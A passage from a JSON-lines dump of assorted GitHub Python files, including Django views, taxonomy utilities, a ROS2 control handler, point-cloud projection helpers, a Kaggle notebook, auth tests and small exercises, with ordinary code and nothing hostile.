Scripts/ResinPriceForecasting_v3.py","file_name":"ResinPriceForecasting_v3.py","file_ext":"py","file_size_in_byte":24309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20542159032","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom .models import Product, Category, Company\n# Create your views here.\n\ndef crud(request):\n\n products = Product.objects.all()\n categories = Category.objects.all()\n companies = Company.objects.all()\n params = {'products': products, 'categories' : categories, 'companies' : companies}\n\n\n return render(request, 'shop/index.html', params)\n\ndef showcategory(request, cat):\n\n categories = Category.objects.all()\n companies = Company.objects.all()\n\n cats = Category.objects.get(name=cat)\n\n products = Product.objects.filter(category=cats).values()\n\n params = {'products' : products, 'category' : cat, 'categories' : categories, 'companies' : companies}\n\n return render(request, 'shop/category.html', params)\n\n\ndef showcompany(request, comp):\n\n categories = Category.objects.all()\n companies = Company.objects.all()\n\n comps = Company.objects.get(name=comp)\n\n products = Product.objects.filter(company=comps).values()\n\n params = {'products' : products, 'category' : comp, 'categories' : categories, 'companies' : companies}\n\n return render(request, 'shop/category.html', params)\n\n\ndef showproduct(request,product_id):\n \n product=Product.objects.get(id=product_id)\n related=Product.objects.exclude(id=product_id).values\n \n params={'product':product,'related':related }\n\n return render(request,'shop/product.html',params)\n\n\n\n\n","repo_name":"deepakcoder2218/deepak_django2","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74051548285","text":"from robertslab.ncbi import db\n\nclass TaxonomyNode:\n def __init__(self, taxid, name, rank):\n self.taxid=taxid\n self.name=name\n self.rank=rank\n self.parent=None\n self.children=[]\n self.leafCount=1\n \n def __str__(self, level=0):\n s=\"\"\n for i in range(0,level):\n s+=\" \"\n ret=s+\"%s (%d)\\n\"%(self.name,self.leafCount)\n for child in self.children:\n ret+=child.__str__(level+1)\n return ret #or results[3] == 131567\n\n def getLeaves(self):\n ret=[]\n if len(self.children) == 0:\n ret.append(self)\n else:\n for child in self.children:\n ret.extend(child.getLeaves())\n return ret\n \n def getAncestory(self):\n if parent == None:\n return [self]\n else:\n ret=parent.getAncestory()\n ret.append(self)\n return ret\n\ndef getTaxidFromGi(gi):\n cursor = db.cursor()\n cursor.execute(\"SELECT taxid FROM tax_gi_to_taxid WHERE gi=%s\",gi)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n return results[0]\n else:\n return None\n \ndef getName(taxid):\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM tax_nodes NATURAL JOIN tax_names WHERE tax_nodes.taxid=%s AND tax_names.class='scientific name'\",taxid)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n return results[0]\n else:\n return None\n\ndef getLineage(taxid, showHidden=True):\n cursor = db.cursor()\n rootNode=None\n while True:\n cursor.execute(\"SELECT taxid,rank,name,parent_taxid,hidden_node FROM tax_nodes NATURAL JOIN tax_names WHERE tax_nodes.taxid=%s AND tax_names.class='scientific name';\",taxid)\n if cursor.rowcount == 1:\n results=cursor.fetchone()\n \n # Add the node to the lineage.\n if showHidden or results[4] == 0:\n newRootNode=TaxonomyNode(results[0],results[2],results[1])\n if rootNode != None:\n newRootNode.children.append(rootNode)\n rootNode.parent=newRootNode\n rootNode=newRootNode\n \n # If the parent is the same as the node, we are done.\n if results[0] == results[3]:\n break\n \n # Set the new node to be the parent and loop again.\n taxid=results[3]\n \n elif cursor.rowcount == 0:\n raise Exception('Unknown taxid',taxid)\n else:\n raise Exception('Invalid taxid',taxid)\n \n return rootNode\n \ndef mergeTrees(taxonomyTrees):\n \n root=taxonomyTrees[0]\n for treeIndex in range(1,len(taxonomyTrees)):\n tree=taxonomyTrees[treeIndex]\n \n # Make sure the trees have the same root.\n if tree.taxid != root.taxid:\n raise Exception('Taxonomy trees to merge must have the same root')\n \n root.leafCount += tree.leafCount\n \n # Go through each child in the tree.\n for child in tree.children:\n \n # Go through each child in the root.\n added=False\n for i in range(0,len(root.children)):\n rootChild=root.children[i]\n \n # If the child is an exact match, merge it with the root's child.\n if child.taxid == rootChild.taxid:\n mergeTrees([rootChild,child])\n added=True\n break\n \n # If the child is lexicographically less than the root child, this must be the place to insert it. \n elif child.name < rootChild.name:\n root.children.insert(i,child)\n child.parent=root;\n added=True\n break\n\n # If we didn't add it, put it add the end.\n if not added:\n root.children.append(child)\n \n return root\n","repo_name":"chloe-lqr/biospark","sub_path":"源文件/源代码/Code/Python/robertslab/ncbi/taxonomy.py","file_name":"taxonomy.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"34981105342","text":"\n\n\n# import gi\n# gi.require_version(\"Gtk\", \"3.0\")\n# from gi.repository import Gtk\nfrom computer_v1 import compute\n\n# class App(Gtk.Window):\n\n# def __init__(self):\n# Gtk.Window.__init__(self, title=\"Computer v1\")\n# self.set_default_size(200, 100)\n# self.set_border_width(10)\n# table = Gtk.Grid()\n# table.set_row_spacing(30)\n# self.add(table)\n\n# entry = Gtk.Entry()\n# entry.set_text(\"Entrez votre polynône ici et validez avec \\\"Entrée\\\"\")\n \n# label = Gtk.Label(\"\")\n# entry.connect(\"activate\", self.cb_activate, label)\n\n# table.attach(entry, 0, 0, 10, 2)\n# table.attach(label, 0, 1, 10, 10)\n\n\n\n# def cb_activate(self, entry, label):\n# equation = entry.get_text()\n# result = compute(equation)\n# label.set_text(result)\n\n# return\n\n\n# win = App()\n# win.connect(\"destroy\", Gtk.main_quit)\n# win.show_all()\n# Gtk.main()\n\n\n\n#########################################################################################################################\n\nfrom tkinter import Tk, StringVar, Label, Entry, Button\nfrom functools import partial\nfrom computer_v1 import compute\n\ndef update_label(label, stringvar, action):\n if action == 'valider':\n equation = stringvar.get()\n res = compute(equation)\n print(res)\n label.config(text=res)\n stringvar.set('')\n elif action == 'effacer':\n label.config(text='')\n stringvar.set('')\n\n\nroot = Tk()\ntext = StringVar(root)\nlabel = Label(root, text='')\nentry_name = Entry(root, textvariable=text)\nbutton = Button(root, text='Valider', command=partial(update_label, label, text, 'valider'))\nclear_button = Button(root, text='Effacer', command=partial(update_label, label, text, 'effacer'))\n\nlabel.grid(column=0, row=0)\nentry_name.grid(column=0, row=1)\nbutton.grid(column=0, row=2)\nclear_button.grid(column=0, row=3)\n\nroot.mainloop()","repo_name":"mmartins1502/computer_v1","sub_path":"tk.py","file_name":"tk.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"33934980391","text":"from scipy.spatial.transform import Rotation\nimport numpy as np\nimport open3d as o3d\nimport struct\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\n\n\n\ndef label_to_color(semantic_map,palette):\n \"\"\"\n @brief Converting semantic label map into rgb cityscapes color palatte with respect to label ids\n @param semantic_map (n*m)\n @param palette By default it is cityscapes palette\n @return colored semantic_map (n*m*3)\n \"\"\"\n\n color_seg = np.zeros((semantic_map.shape[0], semantic_map.shape[1], 3), dtype=np.uint8)\n for label, color in enumerate(palette):\n color_seg[semantic_map == label] = color\n \n \n #Converting BGR to RGB\n color_seg = color_seg[..., ::-1]\n color_seg = color_seg.astype(np.uint8)\n return color_seg\n\n\n\n\ndef semantics_to_colors(semantics:np.array,palette:np.array) -> np.array:\n \"\"\"\n @brief Converting semantic map into rgb cityscapes color palatte with respect to label names\n @param semantics [npoints, 1]\n @return Colors [npoints, 3]\n \"\"\"\n \n \n colors = np.ones((semantics.shape[0], 3))\n \n for label,color in enumerate(palette):\n \n \n colors[semantics == label] = (color[0]/255,color[1]/255,color[2]/255)\n \n \n return colors\n\n\n\ndef visuallize_pointcloud(pointcloud: np.array,path:str,filename:str,palette:np.array) -> None:\n \"\"\"\n @brief Visualizing colored point cloud\n @param pointcloud in lidar coordinate [npoints, 4] in format of [X Y Z label_ids]\n @return None\n \"\"\"\n \n #Get RGB values from pointcloud\n semantics = pointcloud[:, 3]\n #Get xyz values from pointcloud\n xyz = pointcloud[:, 0:3]\n\n\n #Initialize Open3D visualizer\n visualizer = o3d.visualization.Visualizer()\n pcd = o3d.geometry.PointCloud()\n visualizer.add_geometry(pcd)\n\n\n # Get colors of each point according to cityscapes labels\n colors = semantics_to_colors(semantics,palette)\n \n pcd.points = o3d.utility.Vector3dVector(xyz)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n # o3d.visualization.draw_geometries([pcd])\n o3d.io.write_point_cloud(os.path.join(path,\"results\",\"painted_cloud\",filename+\".pcd\"),pcd)\n \n\n\ndef transform_velo_to_cam(R0, Tr_cam_to_lidar):\n \"\"\"\n @brief Implementation for getting Trasformation matrix from lidar to camera\n @param R0: rectification rotation matrix\n @param Tr_cam_to_lidar: Transformation matrix from camera to lidar [3,4]\n @return Trasformation matrix from lidar to camera[3,4]\n \"\"\"\n R_ref2rect = np.eye(4)\n R0_rect = R0.reshape(3, 3) # ref_cam2rect\n R_ref2rect[:3, :3] = R0_rect\n R_ref2rect_inv = np.linalg.inv(R_ref2rect) # rect2ref_cam\n\n # inverse rigid transformation\n cam2velo_ref = np.vstack((Tr_cam_to_lidar.reshape(3, 4), np.array([0., 0., 0., 1.]))) \n P_cam2velo_ref = np.linalg.inv(cam2velo_ref)\n\n proj_mat = P_cam2velo_ref @ R_ref2rect_inv\n return proj_mat\n\ndef projection_velo_to_cam(R0, Tr_lidar_to_cam,P):\n \"\"\"\n @brief Projection matrix for projection of lidar to camera\n @param R0: Rectified Rotation Matrix\n @param Tr_lidar_to_cam: Transformation matrix for lidar to camera\n @param P: Perspective Intrinsics [3,4]\n @return Projection matrix[3,4]\n \"\"\"\n\n R_rect = np.eye(4)\n R0 = R0.reshape(3, 3)\n R_rect[:3, :3] = R0\n P_ = P.reshape((3, 4))\n proj_mat = P_ @ R_rect @ Tr_lidar_to_cam\n return proj_mat\n\n\n\n\n\ndef convert_3D_to_2D(P,lidar_pts):\n \"\"\"\n @brief Projecting 3D points on the image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @return points on image(2D points)[npoints,2] and projected depth [npoints,1]\n \"\"\"\n \n \n\n pts_3d = convert_3d_to_hom(lidar_pts)\n pts_2d= np.dot(pts_3d,P.T)\n \n depth = pts_2d[:, 2]\n depth[depth==0] = -1e-6\n\n pts_2d[:, 0] /= pts_2d[:, 2]\n pts_2d[:, 1] /= pts_2d[:, 2]\n \n pts_2d = pts_2d[:, :2]\n\n return pts_2d,depth\n\n\ndef remove_lidar_points_beyond_img(P,lidar_pts, xmin, ymin, xmax, ymax):\n \"\"\"\n @brief Filter lidar points, keep only those which lie inside image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @param xmin minimum image size width\n @param ymin minimum image size height\n @param xmax maximum image size width\n @param ymax maximum image size height\n @return points on image(2D points)[npoints,2], list of indices, projected depth [npoints,1]\n \"\"\"\n pts_2d,depth = convert_3D_to_2D(P,lidar_pts)\n \n inside_pts_indices = ((pts_2d[:, 0] >= xmin) & (pts_2d[:, 0] < xmax) & (pts_2d[:, 1] >= ymin) & (pts_2d[:, 1] < ymax))\n\n \n \n return pts_2d, inside_pts_indices,depth\n\n\ndef project_lidar_on_image(P, lidar_pts, size):\n \"\"\"\n @brief Projecting 3D lidar points on the image\n @param P lidar to camera projection matrix[3,4]\n @param lidar_pts [npoints,3]\n @param size: image size\n @return filtered points on image(2D points)[npoints,2] and projected depth [npoints,1]\n \"\"\"\n all_pts_2d, fov_inds, depth = remove_lidar_points_beyond_img(P,lidar_pts, 0, 0,size[0], size[1])\n\n return all_pts_2d[fov_inds],depth[fov_inds], lidar_pts[fov_inds]\n\ndef convert_3d_to_hom(pts_3d):\n \"\"\"\n @brief Converting lidar points into homogenous coordinate\n @param pts_3d [npoints,3]\n @return pts_3d into homogenous coordinate [npoints,4]\n \"\"\"\n \n n = pts_3d.shape[0]\n pts_3d_hom = np.hstack((pts_3d, np.ones((n, 1))))\n return pts_3d_hom\n","repo_name":"venk221/Point-Cloud_Semantic-Segmentation-Point-Painting","sub_path":"Code/pcd_folder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"74947607167","text":"import pandas as pd\n\nimport seaborn as sns\n\nimport pathlib as Path\n\nimport matplotlib.pyplot as plt\n\nimport sklearn\n\nimport numpy as np\n\n\n\n\n\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.model_selection import ShuffleSplit\n\nfrom sklearn.model_selection import cross_val_score\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\ndf = pd.read_csv('../input/train.csv')\n\ntst = pd.read_csv('../input/test.csv')\n\ndf.info()\ndf.head()\ndf['pickup_datetime'] = pd.to_datetime(df['pickup_datetime'])\n\ndf['year'] = df['pickup_datetime'].dt.year\n\ndf['month'] = df['pickup_datetime'].dt.month\n\ndf['day'] = df['pickup_datetime'].dt.day\n\ndf['weekday'] = df['pickup_datetime'].dt.weekday\n\ndf['hour'] = df['pickup_datetime'].dt.hour\ndf = df[df['trip_duration']<= 50000]\n\ndf = df[df['passenger_count']>= 1]\ndf.describe()\nselected_columns = ['passenger_count',\n\n 'pickup_latitude',\n\n 'pickup_longitude',\n\n 'dropoff_latitude',\n\n 'dropoff_longitude',\n\n 'year', 'month', \n\n 'day', 'hour',\n\n 'weekday'\n\n ]\ntst['pickup_datetime'] = pd.to_datetime(tst['pickup_datetime'])\n\ntst['year'] = tst['pickup_datetime'].dt.year\n\ntst['month'] = tst['pickup_datetime'].dt.month\n\ntst['day'] = tst['pickup_datetime'].dt.day\n\ntst['weekday'] = tst['pickup_datetime'].dt.weekday\n\ntst['hour'] = tst['pickup_datetime'].dt.hour\ntst.describe()\nX = df[selected_columns]\n\ny = df['trip_duration']\nX.shape, y.shape\nrf = RandomForestRegressor()\n\ncv = ShuffleSplit(n_splits=5, test_size=0.2, train_size=0.1, random_state=200)\n\nlosses = -cross_val_score(rf, X_train, y_train, cv=cv, scoring='neg_mean_squared_log_error')\n\nlosses = [np.sqrt(l) for l in losses]\n\nlosses\nrf.fit(X, y)\ntst = pd.read_csv('../input/test.csv')\n\ntst['pickup_datetime'] = pd.to_datetime(df_test['pickup_datetime'])\n\ntst.head()\nX_test = tst[selected_columns]\ny_pred = rf.predict(X_test)\n\ny_pred.mean()\nsubmission = pd.read_csv(\"../input/sample_submission.csv\")\n\nsubmission.head()\nsubmission.to_csv(\"submission.csv\", index=False)\npd.read_csv(\"submission.csv\")","repo_name":"aorursy/new-nb-2","sub_path":"cyrildev95_cyrilsantos-examtaxi.py","file_name":"cyrildev95_cyrilsantos-examtaxi.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"1702286733","text":"# import threading\r\nimport time\r\nimport curses\r\n\r\nfrom direct_control_shore.UserInterface import UserInterface\r\nfrom shared.JetsonNanoPins import JetsonNanoPins\r\n\r\n\r\ndef handle_user_input_error_mode(screen_view, commands_model_lock):\r\n\ttry:\r\n\t\thandle_user_input(screen_view, commands_model_lock)\r\n\texcept Exception as e:\r\n\t\tglobal error_message_set\r\n\t\terror_message_set.add(\"Error caught\" + str(e))\r\n\r\n\r\ndef handle_user_input(screen_view, commands_model_lock):\r\n\r\n\t# ROS2\r\n\tPublisher = DirectControlPublisher()\r\n\r\n\t# to make sure the shore and nano are synched upon start of direct control \r\n\tROS2_msg = f\"time interval set: {screen_view.time_interval_ms}\"\r\n\tPublisher.single_call(ROS2_msg)\r\n\r\n\tvalid_keys_set = set()\r\n\r\n\twhile True:\r\n\t\t# Get a key\r\n\t\tkey = screen_view.stdscr.getch()\r\n\r\n\t\tcommands_model_lock.acquire()\r\n\r\n\t\t#for the purposes of debuging\r\n\t\tif key == ord(\"F\"):\r\n\t\t\tscreen_view.DEBUG()\r\n\r\n\t\t# Exit if ESC is pressed\r\n\t\telif key == 27:\r\n\t\t\tcurses.nocbreak()\r\n\t\t\tscreen_view.stdscr.keypad(False)\r\n\t\t\tcurses.echo()\r\n\t\t\tcurses.endwin()\r\n\t\t\tbreak\r\n\r\n\t\t# for processing the commands from the file\r\n\t\telif key == ord(\"!\"):\r\n\t\t\t#attempt to build the dictionaries and render the screen, else render the most detailed error possible\r\n\t\t\tif screen_view.generate_dictionaries_from_json():\r\n\t\t\t\tscreen_view.generate_command_screen()\r\n\t\t\t\t# screen_view.DEBUG()\r\n\t\t\t\tscreen_view.render_time_interval_change(0)\r\n\t\t\t\t# screen_view.DEBUG()\r\n\t\t\t\tvalid_keys_set = screen_view.command_keys.keys()\r\n\r\n\t\telif (key == ord(\"+\") or key == ord(\"=\")):\r\n\t\t\t\r\n\t\t\tscreen_view.render_time_interval_change(25)\r\n\t\t\t\r\n\t\t\t# ROS2\r\n\t\t\tROS2_msg = f\"TIME INTERVAL SET: {screen_view.time_interval_ms}\"\r\n\t\t\tPublisher.single_call(ROS2_msg)\r\n\r\n\r\n\t\telif (key == ord(\"-\") or key == ord(\"_\")):\r\n\t\t\tscreen_view.render_time_interval_change(-25)\r\n\r\n\t\t\t# ROS2\r\n\t\t\tROS2_msg = f\"TIME INTERVAL SET: {screen_view.time_interval_ms}\"\r\n\t\t\tPublisher.single_call(ROS2_msg)\t\r\n\r\n\t\telif str(chr(key)) in valid_keys_set:\r\n\t\t\tif screen_view.handle_key_hit(str(chr(key))):\r\n\t\t\t\tcommand_name = screen_view.command_keys[str(chr(key))]\r\n\r\n\t\t\t\t# ROS 2 stuff\r\n\t\t\t\tROS2_msg = f\"PINS: {screen_view.command_pins[command_name]}\"\r\n\t\t\t\tPublisher.single_call(ROS2_msg)\r\n\t\t\t\tpass\r\n\r\n\r\n\t\telse:\r\n\t\t\tpass\r\n\t\t\t\t\r\n\r\n\r\n\t\t\t\r\n\r\n\t\tcommands_model_lock.release()\r\n\r\n\r\n\r\n#TODO move to another file\r\nimport rclpy\r\nfrom rclpy.node import Node\r\n\r\nfrom std_msgs.msg import String \r\n\r\nclass DirectControlPublisher(Node):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__('Direct_Contol_Shore')\r\n\t\tself.publisher_ = self.create_publisher(String, 'Direct_Contol_Topic', 10)\r\n\r\n\tdef single_call(self, incoming_msg):\r\n\t\tmsg = String()\r\n\t\tmsg.data = incoming_msg #'Hello World: %d' % self.i\r\n\t\tself.publisher_.publish(msg)\r\n\t\t# self.get_logger().info('Publishing: \"%s\"' % msg.data)\r\n\t\t# self.i += 1","repo_name":"BeckerWasHere/LPLDLS-ME491-23","sub_path":"ros2_ws_LPLDLS/direct_control_shore/handle_user_input.py","file_name":"handle_user_input.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"16645882334","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework.generics import CreateAPIView, ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import *\nfrom . import ser\nfrom Account.models import Account\n\nfrom django.http import HttpResponse,JsonResponse\n\n\nclass UserLogin(APIView):\n '用户登录视图类'\n authentication_classes = []\n # 登录不需要认证\n\n def post(self, request):\n username = request.POST.get('username').strip()\n pwd = request.POST.get('password').strip()\n if not all([username, pwd]):\n return Response({'msg': '参数不完整', 'code': 400})\n user = UserProfile.objects.filter(username=username).first()\n try:\n user.check_pwd(pwd)\n # 登录成功后生成token\n res = {'msg': 'success', 'code': 200}\n CalcTotalBalance(user)\n res['data'] = ser.UserInfoSer(user).data\n print(res)\n except:\n res = {'msg': '用户名或密码错误', 'code': 404}\n print(res)\n return Response(res)\n\n\nclass UserRegister(CreateAPIView):\n \"\"\"用户注册视图\"\"\"\n authentication_classes = []\n # 用户注册不需要认证\n serializer_class = ser.CreateUserSer\n\n\nclass UserInfoList(ListAPIView):\n \"\"\"用户详情页视图\"\"\"\n serializer_class = ser.UserInfoSer\n queryset = UserProfile.objects.all()\n\n\ndef CalcTotalBalance(userGet):\n allAccounts = Account.objects.filter(user=userGet)\n total_balance: float = 0.0\n for one in allAccounts:\n if one.consumption_or_earn:\n total_balance += one.sum_value\n else:\n total_balance -= one.sum_value\n userGet.total_balance = total_balance\n userGet.save()\n return total_balance\n\n\ndef FetchTotalBalance(request):\n user_id = request.POST.get('user_id')\n userGet = UserProfile.objects.filter(id=user_id).first()\n total_balance = CalcTotalBalance(userGet)\n res = {'total_balance': total_balance}\n return JsonResponse(res,safe=False)\n\n# def getFilterAccount(request):\n# user_id = request.GET.get('user_id')\n# allInfo = requests.get(\"http://localhost:8000/account/\")\n# jsonAll = allInfo.text.strip()\n# print(jsonAll)\n# newList = []\n# for oneInfo in jsonAll:\n \n# print(oneInfo)\n# if oneInfo['user'] == int(user_id):\n# newList.append(oneInfo)\n# print(newList)\n\ndef pushImage(request):\n url = 'http://127.0.0.1:8089/api/tr-run/' # 上传文件接口\n\n # files = {\n\n # 'file': ('tst.png', # 文件名称\n\n # open('tst.png', 'rb'), # 文件路径\n\n # 'image/png', # 文件类型\n\n # {'Expires': '0'} # 其他参数,非必传\n\n # )\n\n # } # => 打开上传文件并且加入文件相关参数\n\n\n\n # data = {\n\n # \"name\": \"tst\"\n\n # }\n print(request.FILES)\n file = request.FILES.get(\"file\",None)\n params = {'file':file}\n\n print(params)\n # data传入请求参数dict,files传入待上传文件参数dict\n import requests,json\n response = requests.post(url, files=params)\n resNew = json.loads(response.text)\n resList = resNew['data']['raw_out']\n with open(\"dataSet.txt\",'w') as f:\n # for one in resList:\n # print(one)\n # f.write(one)\n # f.write('\\n')\n # print(resList[0])\n # for one in resList[0]:\n # print(one)\n for res in resList:\n f.write(res[1] +'\\n')\n f.close()\n import re,json,requests\n lines = []\n with open('dataSet.txt', 'r') as file:\n lines = file.readlines()\n file.close()\n date = []\n money = []\n time = []\n cost = []\n nums = []\n types = []\n moneyStr = \"\\-?\\d+\\.\\d+\"\n dateStr = \"\\d{4}-\\d{2}-\\d{2}\"\n typeStr = \"^卡账户.*$\"\n timeStr = \"\\d{2}:\\d{2}:\\d{2}\"\n flag = False\n for i in range(len(lines)):\n res = re.search(dateStr, lines[i])\n if res != None:\n date.append(res[0])\n nums.append(i)\n\n for j in range(len(nums) - 1):\n for k in range(nums[j], nums[j+1]):\n resMoney = re.search(moneyStr, lines[k])\n resTime = re.search(timeStr, lines[k])\n resType = re.search(typeStr,lines[k])\n if resMoney != None:\n money.append(resMoney[0])\n if resTime != None:\n time.append(resTime[0])\n if resType != None:\n types.append(resType[0])\n for l in range(nums[-1], len(lines)):\n resMoney = re.search(moneyStr, lines[l])\n resTime = re.search(timeStr, lines[l])\n resType = re.search(typeStr, lines[l])\n if resMoney != None:\n money.append(resMoney[0])\n if resTime != None:\n time.append(resTime[0])\n if resType != None:\n types.append(resType[0])\n\n for i in range(0, len(money), 2):\n cost.append(money[i])\n\n # print(date,len(date))\n # print(money ,len(money))\n # print(time ,len(time))\n # print(cost,len(cost))\n # print(nums,len(nums))\n minNum = min(len(nums),len(date),len(types),len(time),len(cost))\n for i in range(minNum):\n params = {\"sum_value\":str(abs(float(cost[i]))),\n \"date_value\":date[i],\n \"time_value\":time[i],\n \"remarks_value\":types[i],\n \"account_type\":\"餐饮伙食\",\n \"billTypeNumber\":\"cyhs\",\n \"consumption_or_earn\": 0,\n \"user\":1\n }\n # params = json.dumps(params)\n # print(params)\n aaa = requests.post(\"http://localhost:8000/account/\",data = params)\n return JsonResponse(\"{ok:ok}\")","repo_name":"JohenanLi/ocrProject","sub_path":"backEnd/Users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27025903812","text":"import json\n\nimport pytest\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom lavocat.api.v1.core.facade import UserNotAllowed, Unauthorized\n\n\n@pytest.fixture\ndef post_authenticate_mock(client, google_auth_mock, google_token):\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_should_call_action(post_authenticate_mock, google_auth_mock, google_token):\n google_auth_mock.assert_called_once_with(google_token)\n\n\n@pytest.fixture\ndef post_authenticate_not_allowed(client, google_auth_mock, google_token):\n google_auth_mock.side_effect = UserNotAllowed\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_not_allowed(post_authenticate_not_allowed):\n assert post_authenticate_not_allowed.status_code == status.HTTP_401_UNAUTHORIZED\n\n\n@pytest.fixture\ndef post_authenticate_unauthorized(client, google_auth_mock, google_token):\n google_auth_mock.side_effect = Unauthorized\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_unauthorized(post_authenticate_unauthorized):\n assert post_authenticate_unauthorized.status_code == status.HTTP_401_UNAUTHORIZED\n\n\n@pytest.fixture\ndef response_content_authorized(token_data, user_email):\n return {\n 'useremail': user_email,\n 'access_token': token_data['access_token'],\n 'refresh_token': token_data['refresh_token'],\n }\n\n\n@pytest.fixture\ndef post_authenticate_authorized(\n client, google_auth_mock, response_content_authorized, google_token\n):\n google_auth_mock.return_value = response_content_authorized\n return client.post(\n reverse('api-v1:google-auth-list'),\n json.dumps({'token': google_token}),\n content_type='application/json',\n )\n\n\ndef test_authorized(post_authenticate_authorized, response_content_authorized):\n assert post_authenticate_authorized.status_code == status.HTTP_200_OK\n assert post_authenticate_authorized.json() == response_content_authorized\n","repo_name":"sleonardoaugusto/lavocat_backend","sub_path":"lavocat/api/v1/core/tests/test_view_google_auth.py","file_name":"test_view_google_auth.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17482544965","text":"from absl import flags\n\nfrom src.util.file_io import load_png, load_spritesheet_json\nfrom src.util.image import upscale_surface\nfrom src.util.types import SpritesheetDict\n\nFLAGS = flags.FLAGS\n\n\ndef get_assets() -> dict:\n asset = {}\n parsed_pngs = []\n\n for file_type in FLAGS.game.path:\n if file_type == \"json\":\n for file in FLAGS.game.path[file_type]:\n surface = load_png(filepath=FLAGS.game.path.png[file])\n frames, tags = load_spritesheet_json(\n filepath=FLAGS.game.path[file_type][file]\n )\n asset[file] = SpritesheetDict(image=surface, frames=frames, tags=tags)\n parsed_pngs.append(file)\n\n elif file_type == \"png\":\n for file in FLAGS.game.path[file_type]:\n if file in parsed_pngs:\n continue\n\n surface = load_png(filepath=FLAGS.game.path.png[file])\n scaled_surface = upscale_surface(surface=surface)\n asset[file] = scaled_surface\n\n return asset\n","repo_name":"castilloglenn/slime-smashers","sub_path":"src/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"568809626","text":"#----------------------------------------------------\r\n# Dateiname: assert_iterable.py \r\n# Beispiel für assert-Anweisung zum Testen von Vorbedingungen\r\n#\r\n# Python 3 mitp Verlag\r\n# Kap. 21\r\n# Michael Weigend 7.6.2019\r\n#----------------------------------------------------\r\n\r\n\r\ndef diversität(s):\r\n # liefert die Anzahl unterschiedlicher Elemente einer Kollektion\r\n assert hasattr(s, '__iter__')\r\n assert len(s) > 0\r\n menge = set(s)\r\n return len(menge)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(diversität('Barbara'))\r\n print(diversität(110))\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"mweigend/python3","sub_path":"Kapitel 21/assert_iterable.py","file_name":"assert_iterable.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"30598218400","text":"\n\ndef add_to_clock(hour, min, sec, diff):\n sign = 1 if diff >= 0 else -1\n\n hour += (abs(diff)//3600)*sign\n diff = (abs(diff) % 3600)*sign\n min += (abs(diff) // 60)*sign\n diff = (abs(diff) % 60)*sign\n sec += diff\n\n if sign > 0:\n min += sec // 60\n sec %= 60\n\n hour += min // 60\n min %= 60\n\n hour %= 24\n\n if sec < 0:\n sec = 60 + sec\n min -= 1\n if min < 0:\n min = 60 + min\n hour -= 1\n if hour < 0:\n hour = 24 + hour\n\n return hour + \":\" + min + \":\" + sec\n\n\ndef collatz_seq(num, to_print=False):\n if to_print:\n print(num, end=\" \")\n count = 0\n while num != 1:\n count = count +1\n if num % 2 == 0:\n num = num // 2\n else:\n num = num*3+1\n if to_print:\n print(num, end=\" \")\n\n return count\n\n\ndef exercise01():\n print(\"********* Exercise 1*********\")\n print(add_to_clock(23, 59, 59, 10))\n #print(add_to_clock(15, 42, 28, 3825))\n #print(add_to_clock(15, 42, 28, -3825))\n #print(add_to_clock(0, 0, 9, -10))\n #print(add_to_clock(23, 59, 59, 3662))\n print(\"*********Exercise 1*********\\n\")\n\ndef exercise02():\n print(\"********* Exercise 2*********\")\n print(collatz_seq(485))\n print(\"*********Exercise 2*********\\n\")","repo_name":"ameydan/ISE102-2021","sub_path":"L1104/Exercises.py","file_name":"Exercises.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"9235093822","text":"from 